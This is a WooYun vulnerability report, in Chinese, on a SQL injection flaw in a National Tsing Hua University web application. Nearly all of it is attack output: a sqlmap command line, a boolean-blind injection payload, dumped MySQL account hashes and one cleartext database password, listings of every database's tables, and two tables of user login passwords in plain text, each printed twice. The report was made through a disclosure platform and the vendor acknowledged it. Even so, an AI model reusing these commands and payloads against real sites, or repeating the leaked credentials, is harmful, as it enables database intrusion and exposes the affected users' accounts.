当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157741

漏洞标题:国立清华大学某站存在SQL注射漏洞(DBA权限+root密码+系统管理密码+大量用户明文密码)(臺灣地區)

相关厂商:国立清华大学

漏洞作者: 路人甲

提交时间:2015-12-03 11:37

修复时间:2016-01-19 22:40

公开时间:2016-01-19 22:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-03: 细节已通知厂商并且等待厂商处理中
2015-12-05: 厂商已经确认,细节仅向厂商公开
2015-12-15: 细节向核心白帽子及相关领域专家公开
2015-12-25: 细节向普通白帽子公开
2016-01-04: 细节向实习白帽子公开
2016-01-19: 细节向公众公开

简要描述:

国立清华大学某站存在SQL注射漏洞(DBA权限+root密码+系统管理密码+大量用户明文密码)

详细说明:

地址:http://**.**.**.**/aviso/list/available_book.php?class=LA

$ python sqlmap.py -u "http://**.**.**.**/aviso/list/available_book.php?class=LA" -p class --technique=B --random-agent --batch  --no-cast --current-user --is-dba --users --passwords --count --search -C pass


current user:    'root@localhost'
current user is DBA:    True
database management system users [14]:
[*] ''@'**.**.**.**'
[*] ''@'localhost'
[*] 'bplan'@'**.**.**.**'
[*] 'bplan'@'**.**.**.**'
[*] 'ideal'@'localhost'
[*] 'project'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'root'@'::1'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'shadow'@'localhost'
[*] 'tcs'@'%'
[*] 'tcs'@'**.**.**.**'
[*] 'tcs'@'localhost'
database management system users password hashes:
[*]  [1]:
    password hash: NULL
[*] bplan [1]:
    password hash: 3dae533c070a7c05
[*] ideal [1]:
    password hash: 39171de84099b35d
[*] project [1]:
    password hash: 48b5354d1be7db97
    clear-text password: project
[*] root [2]:
    password hash: 1d7586b137a8cb57
    password hash: NULL
[*] shadow [1]:
    password hash: 6573964f2f148124
[*] tcs [2]:
    password hash: *8D71256BB4128ECD2E4D94886D89500320B63C87
    password hash: 7032160f2b1b2321


Database: TextbookQuestionary96
Table: account
[29 entries]
+--------------+
| login_passwd |
+--------------+
| 11153        |
| 400924       |
| 86852011     |
| p221922      |
| PT10864      |
| PT11080      |
| PT22060      |
| PT26056      |
| PT30070      |
| PT403        |
| PT41401      |
| PT42050      |
| PT42149      |
| PT60043      |
| PT63850      |
| PT640501     |
| PT70047      |
| PT70148      |
| PT70449      |
| PT71088      |
| PT71242      |
| PT72242      |
| PT74169      |
| PT80748      |
| PT81157      |
| PT83052      |
| PT83067      |
| PT94641      |
| tel5048      |
+--------------+
Database: TextbookQuestionary
Table: account
[98 entries]
+--------------+
| login_passwd |
+--------------+
|              |
| 0000         |
| 010335       |
| 064328       |
| 064342       |
| 1000801      |
| 107          |
| 110311t      |
| 110312       |
| 1121         |
| 120402       |
| 140404       |
| 150303       |
| 190315t      |
| 190406       |
| 202182       |
| 20403        |
| 2051001      |
| 210303       |
| 210309T      |
| 211419       |
| 2115418      |
| 227          |
| 2304082      |
| 23250957     |
| 27977035     |
| 323301       |
| 3313sh       |
| 3331         |
| 350001       |
| 363301       |
| 505661       |
| 54321        |
| 552588       |
| 553302i      |
| 576579       |
| 8320364      |
| 84265751     |
| 86852011     |
| 90305        |
| 9184044      |
| adm109       |
| arrow743     |
| cyhsspec     |
| fg222        |
| pcsh2010     |
| PT10051      |
| PT10671      |
| PT111-5      |
| PT11660      |
| PT11665      |
| PT20345      |
| PT22066      |
| PT22177      |
| PT2222       |
| PT23443      |
| PT24306      |
| PT26051      |
| PT26542      |
| PT30070      |
| PT30343      |
| PT32015      |
| PT32041      |
| PT32742      |
| PT33052      |
| PT35857      |
| PT40249      |
| PT40308      |
| PT40642      |
| PT40861      |
| PT41260      |
| PT41401      |
| PT42147      |
| PT42149      |
| PT50057      |
| PT54044      |
| PT54546      |
| PT60043      |
| PT60070      |
| PT63850      |
| PT65145      |
| PT70043      |
| PT70116      |
| PT80276      |
| PT80284      |
| PT80748      |
| PT81157      |
| PT81368      |
| PT83067      |
| PT85214      |
| PT85247      |
| PT93075      |
| PT97054      |
| special      |
| tel5048      |
| trista       |
| wutywuty     |
| ym8175       |
+--------------+

漏洞证明:

---
Parameter: class (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: class=LA' AND 8567=8567#
---
web server operating system: FreeBSD
web application technology: PHP 4.4.9, Apache 2.2.18
back-end DBMS: MySQL >= 5.0.0
current user:    'root@localhost'
current user is DBA:    True
database management system users [14]:
[*] ''@'**.**.**.**'
[*] ''@'localhost'
[*] 'bplan'@'**.**.**.**'
[*] 'bplan'@'**.**.**.**'
[*] 'ideal'@'localhost'
[*] 'project'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'root'@'::1'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'shadow'@'localhost'
[*] 'tcs'@'%'
[*] 'tcs'@'**.**.**.**'
[*] 'tcs'@'localhost'
database management system users password hashes:
[*]  [1]:
    password hash: NULL
[*] bplan [1]:
    password hash: 3dae533c070a7c05
[*] ideal [1]:
    password hash: 39171de84099b35d
[*] project [1]:
    password hash: 48b5354d1be7db97
    clear-text password: project
[*] root [2]:
    password hash: 1d7586b137a8cb57
    password hash: NULL
[*] shadow [1]:
    password hash: 6573964f2f148124
[*] tcs [2]:
    password hash: *8D71256BB4128ECD2E4D94886D89500320B63C87
    password hash: 7032160f2b1b2321
Database: TextbookQuestionary
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| Require                               | 2994    |
| DistributeHistory                     | 1856    |
| Student                               | 555     |
| SchoolList                            | 504     |
| DistributeVersion                     | 492     |
| NoRequireList                         | 384     |
| MailToAll                             | 301     |
| SubjectSetting                        | 203     |
| Require_backup                        | 202     |
| account                               | 98      |
| UserInformation                       | 98      |
| QuestionarySub                        | 22      |
| DistributeSub                         | 20      |
| PublisherSetting                      | 17      |
| QuestionaryPub                        | 11      |
| DLtimeline                            | 1       |
| QuestionaryDuration                   | 1       |
+---------------------------------------+---------+
Database: performance_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| setup_consumers                       | 8       |
| performance_timers                    | 5       |
| setup_timers                          | 1       |
+---------------------------------------+---------+
Database: mp3_file
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| `count`                               | 3229911 |
| nthu_new                              | 75170   |
| ckysc                                 | 22389   |
| ckysc_back                            | 6454    |
| tmp                                   | 5699    |
| blindreader                           | 2608    |
| mp3_new                               | 2203    |
| daisy                                 | 2037    |
| lb                                    | 1695    |
| ncue                                  | 1470    |
| shadow                                | 1459    |
| reader                                | 1446    |
| reader_bfRename                       | 546     |
| tkblind                               | 296     |
| tape                                  | 294     |
| braille                               | 62      |
| nthu_book_rf                          | 42      |
| mp3_file_cdremove                     | 10      |
| db_update_date                        | 1       |
| owl_update_date                       | 1       |
+---------------------------------------+---------+
Database: BlindSystem
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| bookHandleRec                         | 100596  |
| lendbook                              | 81713   |
| reader_lend                           | 78696   |
| bookLendRegTmp                        | 46761   |
| book                                  | 17702   |
| bookView                              | 17702   |
| booktemp1                             | 16676   |
| success                               | 13447   |
| bookCopy                              | 10162   |
| bookCount                             | 10101   |
| printDateReg                          | 9224    |
| bookCopyTmp                           | 8285    |
| man                                   | 5467    |
| bookmail                              | 3855    |
| temp                                  | 3673    |
| reader                                | 3506    |
| readerInfo_delete                     | 3324    |
| bookckysc                             | 2653    |
| bookAbstract                          | 2345    |
| readerTmp                             | 1969    |
| borrowing                             | 1439    |
| booklendreg2009                       | 705     |
| textbook                              | 669     |
| textbooktemp                          | 579     |
| textbookold                           | 488     |
| CSD                                   | 308     |
| Gio                                   | 306     |
| bookLendReg                           | 257     |
| Giobook                               | 223     |
| MP3machineLend                        | 79      |
| tmp                                   | 66      |
| failure                               | 57      |
| succProblem                           | 49      |
| bookRF                                | 42      |
| MP3machineList                        | 39      |
| textbook_lend                         | 23      |
| succTmp                               | 15      |
| worker                                | 13      |
| StatisticLogin                        | 5       |
| request                               | 2       |
| mngrLog                               | 1       |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| help_relation                         | 992     |
| help_topic                            | 505     |
| help_keyword                          | 453     |
| help_category                         | 38      |
| `user`                                | 14      |
| tables_priv                           | 3       |
| db                                    | 2       |
| proxies_priv                          | 2       |
+---------------------------------------+---------+
Database: TextbookQuestionary96
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| DistributeHistory                     | 1560    |
| DistributeHis_0912                    | 1440    |
| Require0824                           | 205     |
| Require                               | 202     |
| TESTofSQL                             | 196     |
| Student                               | 75      |
| account                               | 29      |
| UserInformation                       | 28      |
| QuestionarySub                        | 22      |
| QuestionarySub2                       | 22      |
| QuestionarySub3                       | 22      |
| DistributeSub                         | 20      |
| QuestionaryPub                        | 11      |
| QuestionaryPub1                       | 11      |
+---------------------------------------+---------+
Database: aviso
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| reGuest                               | 46356   |
| success                               | 29875   |
| success20100309                       | 27535   |
| recording                             | 4580    |
| newBook                               | 547     |
| UA                                    | 426     |
| guest                                 | 157     |
| GYnewbook                             | 117     |
| tmp                                   | 87      |
| bookRF                                | 42      |
+---------------------------------------+---------+
Database: 94project
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| worker                                | 2369    |
| book_back                             | 804     |
| book                                  | 458     |
| tmp                                   | 308     |
| bookRF                                | 42      |
| working                               | 9       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 1450    |
| SESSION_VARIABLES                     | 321     |
| GLOBAL_VARIABLES                      | 310     |
| GLOBAL_STATUS                         | 309     |
| SESSION_STATUS                        | 309     |
| USER_PRIVILEGES                       | 203     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 195     |
| COLLATIONS                            | 195     |
| TABLES                                | 190     |
| PARTITIONS                            | 189     |
| STATISTICS                            | 105     |
| KEY_COLUMN_USAGE                      | 99      |
| TABLE_CONSTRAINTS                     | 60      |
| CHARACTER_SETS                        | 39      |
| SCHEMA_PRIVILEGES                     | 32      |
| PLUGINS                               | 17      |
| SCHEMATA                              | 11      |
| INNODB_CMPMEM                         | 8       |
| INNODB_CMPMEM_RESET                   | 8       |
| ENGINES                               | 6       |
| INNODB_CMP                            | 5       |
| INNODB_CMP_RESET                      | 5       |
| TABLE_PRIVILEGES                      | 3       |
| PROCESSLIST                           | 1       |
| VIEWS                                 | 1       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: TextbookQuestionary96
Table: account
[1 column]
+--------------+
| Column       |
+--------------+
| login_passwd |
+--------------+
Database: TextbookQuestionary
Table: account
[1 column]
+--------------+
| Column       |
+--------------+
| login_passwd |
+--------------+
Database: mp3_file
Table: shadow
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Database: mp3_file
Table: reader_bfRename
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Database: mp3_file
Table: reader
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Database: mysql
Table: user
[1 column]
+----------+
| Column   |
+----------+
| Password |
+----------+
Database: mysql
Table: servers
[1 column]
+----------+
| Column   |
+----------+
| Password |
+----------+
Database: TextbookQuestionary96
Table: account
[29 entries]
+--------------+
| login_passwd |
+--------------+
| 11153        |
| 400924       |
| 86852011     |
| p221922      |
| PT10864      |
| PT11080      |
| PT22060      |
| PT26056      |
| PT30070      |
| PT403        |
| PT41401      |
| PT42050      |
| PT42149      |
| PT60043      |
| PT63850      |
| PT640501     |
| PT70047      |
| PT70148      |
| PT70449      |
| PT71088      |
| PT71242      |
| PT72242      |
| PT74169      |
| PT80748      |
| PT81157      |
| PT83052      |
| PT83067      |
| PT94641      |
| tel5048      |
+--------------+
Database: TextbookQuestionary
Table: account
[98 entries]
+--------------+
| login_passwd |
+--------------+
|              |
| 0000         |
| 010335       |
| 064328       |
| 064342       |
| 1000801      |
| 107          |
| 110311t      |
| 110312       |
| 1121         |
| 120402       |
| 140404       |
| 150303       |
| 190315t      |
| 190406       |
| 202182       |
| 20403        |
| 2051001      |
| 210303       |
| 210309T      |
| 211419       |
| 2115418      |
| 227          |
| 2304082      |
| 23250957     |
| 27977035     |
| 323301       |
| 3313sh       |
| 3331         |
| 350001       |
| 363301       |
| 505661       |
| 54321        |
| 552588       |
| 553302i      |
| 576579       |
| 8320364      |
| 84265751     |
| 86852011     |
| 90305        |
| 9184044      |
| adm109       |
| arrow743     |
| cyhsspec     |
| fg222        |
| pcsh2010     |
| PT10051      |
| PT10671      |
| PT111-5      |
| PT11660      |
| PT11665      |
| PT20345      |
| PT22066      |
| PT22177      |
| PT2222       |
| PT23443      |
| PT24306      |
| PT26051      |
| PT26542      |
| PT30070      |
| PT30343      |
| PT32015      |
| PT32041      |
| PT32742      |
| PT33052      |
| PT35857      |
| PT40249      |
| PT40308      |
| PT40642      |
| PT40861      |
| PT41260      |
| PT41401      |
| PT42147      |
| PT42149      |
| PT50057      |
| PT54044      |
| PT54546      |
| PT60043      |
| PT60070      |
| PT63850      |
| PT65145      |
| PT70043      |
| PT70116      |
| PT80276      |
| PT80284      |
| PT80748      |
| PT81157      |
| PT81368      |
| PT83067      |
| PT85214      |
| PT85247      |
| PT93075      |
| PT97054      |
| special      |
| tel5048      |
| trista       |
| wutywuty     |
| ym8175       |
+--------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-12-05 22:37

厂商回复:

感謝通報

最新状态:

暂无